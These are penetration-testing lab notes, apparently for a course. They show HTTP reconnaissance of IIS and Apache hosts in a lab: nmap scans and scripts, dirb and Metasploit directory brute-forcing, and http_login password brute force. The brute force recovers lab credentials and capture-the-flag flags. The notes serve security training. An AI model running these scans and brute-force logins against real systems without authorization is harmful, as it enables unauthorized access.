HTTP
(H yper T ext T ransfer P rotocol) - a client-server application layer protocol, used to load web pages using hypertext links.
A client machine makes a request
to a server (usually from a website), which then sends a response
message back to the client.
Default HTTP
port is 80
and HTTPS
port is 443
.
Copy sudo nmap -p80 -sV -O < TARGET_I P >
Lab 1
🔬 Windows Recon: IIS
Enumeration of an IIS
HTTP server, without the usage of a browser
Copy nmap 10.4 .16.17
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
Copy nmap -sV -O 10.4 .16.17
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V =7.91%E=4%D=2/16%OT=80%CT=1%CU=40432%PV=Y%DS=3%DC=I%G=Y%TM=63EE45E
OS:B%P =x86_64-pc-linux-gnu)SEQ(SP = 102 %GCD= 1 %ISR= 10 B%TI=I%CI=I%II=I%SS=S%TS=
OS:U )OPS(O1 = M546NW8NNS%O2=M546NW8NNS%O3=M546NW8%O4=M546NW8NNS%O5=M546NW8NNS
OS:%O6 =M546NNS)WIN(W1 = FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70 ) ECN (R = Y%
OS:DF =Y%T=7F%W=FFFF%O=M546NW8NNS%CC=Y%Q=) T1 (R = Y%DF=Y%T= 7 F%S=O%A=S+%F=AS%RD=
OS:0%Q =) T2 (R = Y%DF=Y%T= 7 F%W= 0 %S=Z%A=S%F=AR%O=%RD= 0 %Q= ) T3 (R = Y%DF=Y%T= 7 F%W= 0 %S
OS: =Z%A=O%F=AR%O=%RD=0%Q=) T4 (R = Y%DF=Y%T= 7 F%W= 0 %S=A%A=O%F=R%O=%RD= 0 %Q= ) T5 (R =
OS:Y%DF =Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6 (R = Y%DF=Y%T= 7 F%W= 0 %S=A%A=O%F=
OS:R%O =%RD=0%Q=) T7 (R = Y%DF=Y%T= 7 F%W= 0 %S=Z%A=S+%F=AR%O=%RD= 0 %Q= ) U1 (R = Y%DF=N%T
OS: =7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE (R = Y%DFI=N%T= 7 F%CD=
OS:Z )
Network Distance: 3 hops
Service Info: OS: Windows ; CPE: cpe:/o:microsoft:windows
Copy Ignoring eventmachine-1.3.0.dev.1 because its extensions are not built. Try: gem pristine eventmachine --version 1.3.0.dev.1
Ignoring fxruby-1.6.29 because its extensions are not built. Try: gem pristine fxruby --version 1.6 .29
http://10.4.16.17 [302 Found] ASP_NET[4.0.30319], Cookies[ASP.NET_SessionId,Server], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], HttpOnly[ASP.NET_SessionId], IP[10.4.16.17], Microsoft-IIS[10.0], RedirectLocation[/Default.aspx], Title[Object moved], X-Powered-By[ASP.NET], X-XSS-Protection[0]
http://10.4.16.17/Default.aspx [302 Found] ASP_NET[4.0.30319], Cookies[ASP.NET_SessionId,Server], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], HttpOnly[ASP.NET_SessionId], IP[10.4.16.17], Microsoft-IIS[10.0], RedirectLocation[/Default.aspx], Title[Object moved], X-Powered-By[ASP.NET], X-XSS-Protection[0]
📌
IIS Server version is 10.0
ASP.NET version is 4.0.30319
Default page of the target web app is /Default.aspx
httpie
- CLI, cURL-like tool for humans. Run with http
Copy HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 130
Content-Type: text/html ; charset = utf-8
Date: Thu, 16 Feb 2023 15 :11:59 GMT
Location: /Default.aspx
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=ngl4kddnvb5g3dx0vol2j11q ; path = / ; HttpOnly ; SameSite = Lax
Set-Cookie: Server=RE9UTkVUR09BVA== ; path = /
X-AspNet-Version: 4.0 .30319
X-Powered-By: ASP.NET
X-XSS-Protection: 0
< html><head><title > Object moved < /title></head><body >
< h 2> Object moved to < a href= "/Default.aspx" > here < /a > . < /h 2>
< /body></html >
dirb
- a Web content scanner. It launches a dictionary based attack
against a web server, looking for existing Web Objects and analyzing the response . It comes with a set of preconfigured attack wordlists .
Try to browse to the found directories to find out if access is granted
Copy dirb http://10.4.16.17
Copy -----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Feb 16 20 :49:36 2023
URL_BASE: http://10.4.16.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
# ^ default wordlist
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.4.16.17/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/
==> DIRECTORY: http://10.4.16.17/aspnet_client/
==> DIRECTORY: http://10.4.16.17/configuration/
==> DIRECTORY: http://10.4.16.17/content/
==> DIRECTORY: http://10.4.16.17/Content/
==> DIRECTORY: http://10.4.16.17/downloads/
==> DIRECTORY: http://10.4.16.17/Downloads/
==> DIRECTORY: http://10.4.16.17/resources/
==> DIRECTORY: http://10.4.16.17/Resources/
---- Entering directory: http://10.4.16.17/app_themes/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/default/
==> DIRECTORY: http://10.4.16.17/app_themes/Default/
---- Entering directory: http://10.4.16.17/aspnet_client/ ----
==> DIRECTORY: http://10.4.16.17/aspnet_client/system_web/
[...]
---- Entering directory: http://10.4.16.17/resources/ ----
==> DIRECTORY: http://10.4.16.17/resources/images/
==> DIRECTORY: http://10.4.16.17/resources/Images/
---- Entering directory: http://10.4.16.17/Resources/ ----
==> DIRECTORY: http://10.4.16.17/Resources/images/
==> DIRECTORY: http://10.4.16.17/Resources/Images/
---- Entering directory: http://10.4.16.17/app_themes/default/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/default/images/
==> DIRECTORY: http://10.4.16.17/app_themes/default/Images/
---- Entering directory: http://10.4.16.17/app_themes/Default/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/Default/images/
==> DIRECTORY: http://10.4.16.17/app_themes/Default/Images/
[...]
browsh
- A fully interactive, real-time, and modern text-based browser rendered to TTYs and browsers . It's used when only command line is available or now browser is installed.
Copy browsh --startup-url http://10.4.16.17/Default.aspx
📌 The target application is WebGoat.net
Lab 2
🔬 Windows Recon: IIS: Nmap Scripts
Enumeration of an IIS
HTTP server using nmap
scripts
Copy nmap 10.4 .21.207
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
Copy nmap --script=http-enum -sV -p80 10.4 .21.207
Copy 80/tcp open http Microsoft IIS httpd 10.0
| http-enum:
| /content/: Potentially interesting folder
| /downloads/: Potentially interesting folder
| _ /webdav/: Potentially interesting folder
| _http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows ; CPE: cpe:/o:microsoft:windows
📌 Potentially interesting folders are content
, downloads
, webdav
.
Copy nmap --script=http-headers -sV -p80 10.4 .21.207
Copy 80/tcp open http Microsoft IIS httpd 10.0
| http-headers:
| Cache-Control: private
| Content-Type: text/html ; charset = utf-8
| Location: /Default.aspx
| Server: Microsoft-IIS/10.0
| Set-Cookie: ASP.NET_SessionId=vepmic1tb4hcstgiqdkjj3iy ; path = / ; HttpOnly ; SameSite = Lax
| X-AspNet-Version: 4.0 .30319
| Set-Cookie: Server=RE9UTkVUR09BVA== ; path = /
| X-XSS-Protection: 0
| X-Powered-By: ASP.NET
| Date: Thu, 16 Feb 2023 15 :48:53 GMT
| Connection: close
| Content-Length: 130
|
| _ (Request type: GET )
| _http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows ; CPE: cpe:/o:microsoft:windows
📌
IIS Server version is 10.0
ASP.NET version is 4.0.30319
Default page of the target web app is /Default.aspx
Copy nmap --script=http-methods --script-args http-methods.url-path=/webdav/ -p80 10.4 .21.207
Copy PORT STATE SERVICE
80/tcp open http
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| _ Path tested: /webdav/
📌 Enumerated supported HTTP methods are OPTIONS
, TRACE
, GET
, HEAD
, POST
, COPY
, PROPFIND
, DELETE
, MOVE
, PROPPATCH
, MKCOL
, LOCK
, UNLOCK
, PUT
Copy nmap --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ -p80 10.4 .21.207
Copy 80/tcp open http
| http-webdav-scan:
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/10.0
| Server Date: Thu, 16 Feb 2023 15 :58:39 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| _ Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
Lab 3
🔬 Apache Recon: Dictionary Attack
Enumeration of an Apache
HTTP server
Copy ip -br -c a
eth1@if172533 UP 192.199 .232.2/24
Copy nmap -sV -sC 192.199 .232.3
Copy 80/tcp open http Apache httpd 2.4 .18 ((Ubuntu))
| _http-server-header: Apache/2.4.18 (Ubuntu)
| _http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02 :42:C0:C7:E8:03 (Unknown)
📌 Running web server version is Apache httpd 2.4.18
Copy curl 192.199 .232.3 | more
# or
browsh --startup-url http://192.199.232.3
📌 Apache2 Ubuntu Default page
is hosted on the running web server.
Perform directories bruteforce, using the brute_dirs
metasploit module. Use robots_txt module to detect robots.txt
files and analize its content too.
Copy use auxiliary/scanner/http/brute_dirs
set RHOSTS 192.199 .232.3
exploit
Copy [ * ] Using code '404' as not found.
[+] Found http://192.199.232.3:80/dir/ 401
[+] Found http://192.199.232.3:80/poc/ 401
[ * ] Scanned 1 of 1 hosts ( 100% complete )
[ * ] Auxiliary module execution completed
📌 dir
, poc
directories found.
Copy use auxiliary/scanner/http/robots_txt
set RHOSTS 192.199 .232.3
exploit
Copy [ * ] Scanned 1 of 1 hosts ( 100% complete )
[ * ] Auxiliary module execution completed
# No /robots.txt found
curl
- command line tool and librare for transferring data with URLs
Copy curl http://192.199.232.3/dir
Copy < title >401 Unauthorized</ title >
Copy curl -I http://192.199.232.3/dir
Copy HTTP/1.1 401 Unauthorized
Date: Thu, 16 Feb 2023 18 :00:56 GMT
Server: Apache/2.4.18 (Ubuntu)
WWW-Authenticate: Basic realm= "private"
Content-Type: text/html ; charset = iso-8859-1
📌 dir directory is using Basic
auth protection - WWW-Authenticate header
Copy curl http://192.199.232.3/poc
Copy < title >301 Moved Permanently</ title >
Use http_header
metasploit module to find the poc directory protection
Copy use auxiliary/scanner/http/http_header
set RHOSTS 192.199 .232.3
set HTTP_METHOD GET
set TARGETURI /poc/
exploit
Copy [+] 192.199.232.3:80 : CONTENT-TYPE: text/html; charset = iso-8859-1
[+] 192.199.232.3:80 : SERVER: Apache/2.4.18 ( Ubuntu )
[+] 192.199.232.3:80 : WWW-AUTHENTICATE: Digest realm="Private", nonce="92BOH9X0BQA=373907c8c2a4e147272a81df61079fa305e185af", algorithm=MD5, qop="auth"
[+] 192.199.232.3:80 : detected 3 headers
[ * ] Scanned 1 of 1 hosts ( 100% complete )
[ * ] Auxiliary module execution completed
📌 poc directory is using Difest
auth protection
Use http_login
metasploit module to attempt HTTP user authentication
Copy echo -e "alice\nbob\n" > /tmp/users
# to create "alice" and "bob" users list
msfconsole
Copy use auxiliary/scanner/http/http_login
set RHOSTS 192.199 .232.3
set USER_FILE /tmp/users
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set AUTH_URI /dir/
exploit
Copy [ * ] Attempting to login to http://192.199.232.3:80/dir/
[+] 192.199.232.3:80 - Success: 'bob:qwerty'
[ * ] Scanned 1 of 1 hosts ( 100% complete )
[ * ] Auxiliary module execution completed
📌 dir directory credentials are bob:qwerty
Copy curl -u bob:qwerty http://192.199.232.3/dir/
Reveal Flag - dir directory flag is: 🚩72af1d9471cfea41ac0ff3600b3702f6
Copy use auxiliary/scanner/http/http_login
set RHOSTS 192.199 .232.3
set USER_FILE /tmp/users
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set AUTH_URI /poc/
exploit
Copy [ * ] Attempting to login to http://192.199.232.3:80/poc/
[+] 192.199.232.3:80 - Success: 'alice:password1'
[ * ] Scanned 1 of 1 hosts ( 100% complete )
[ * ] Auxiliary module execution completed
📌 poc directory credentials are alice:password1
Copy curl --digest -u alice:password1 http://192.199.232.3/poc/
Reveal Flag - poc directory flag is: 🚩0b6f98199bae51afc2f60578f923f8af
Lab 4
🔬 Apache Recon: Basics
Enumeration of an Apache
HTTP server
Copy ip -br -c a
eth1@if172533 UP 192.157 .222.2/24
Copy nmap -sV -sC 192.157 .222.3
Copy 80/tcp open http Apache httpd 2.4 .18 ((Ubuntu))
| _http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 3 disallowed entries
| _/cgi-bin/ Disallow: /junk/ /no-badbot-dir/
| _http-title: Apache2 Ubuntu Default Page: It works
📌 Running web server version is Apache httpd 2.4.18
Copy curl http://192.157.222.3
wget http://192.157.222.3
cat index.html
lynx
- is a text web browser .
Copy lynx http://192.157.222.3
Copy dirb http://192.157.222.3 /usr/share/metasploit-framework/data/wordlists/directory.txt
Copy ---- Scanning URL: http://192.157.222.3/ ----
+ http://192.157.222.3//data (CODE:301|SIZE:313)
+ http://192.157.222.3//dir (CODE:301|SIZE:312)
Copy setg RHOSTS 192.157.222.3
setg RHOST 192.157.222.3
use auxiliary/scanner/http/http_version
run
[+] 192.157.222.3:80 Apache/2.4.18 (Ubuntu)
use auxiliary/scanner/http/brute_dirs
run
[+] Found http://192.157.222.3:80/dir/ 200
[+] Found http://192.157.222.3:80/src/ 200
Copy curl http://192.157.222.3/robots.txt
Reveal Flag - poc directory flag is: 🚩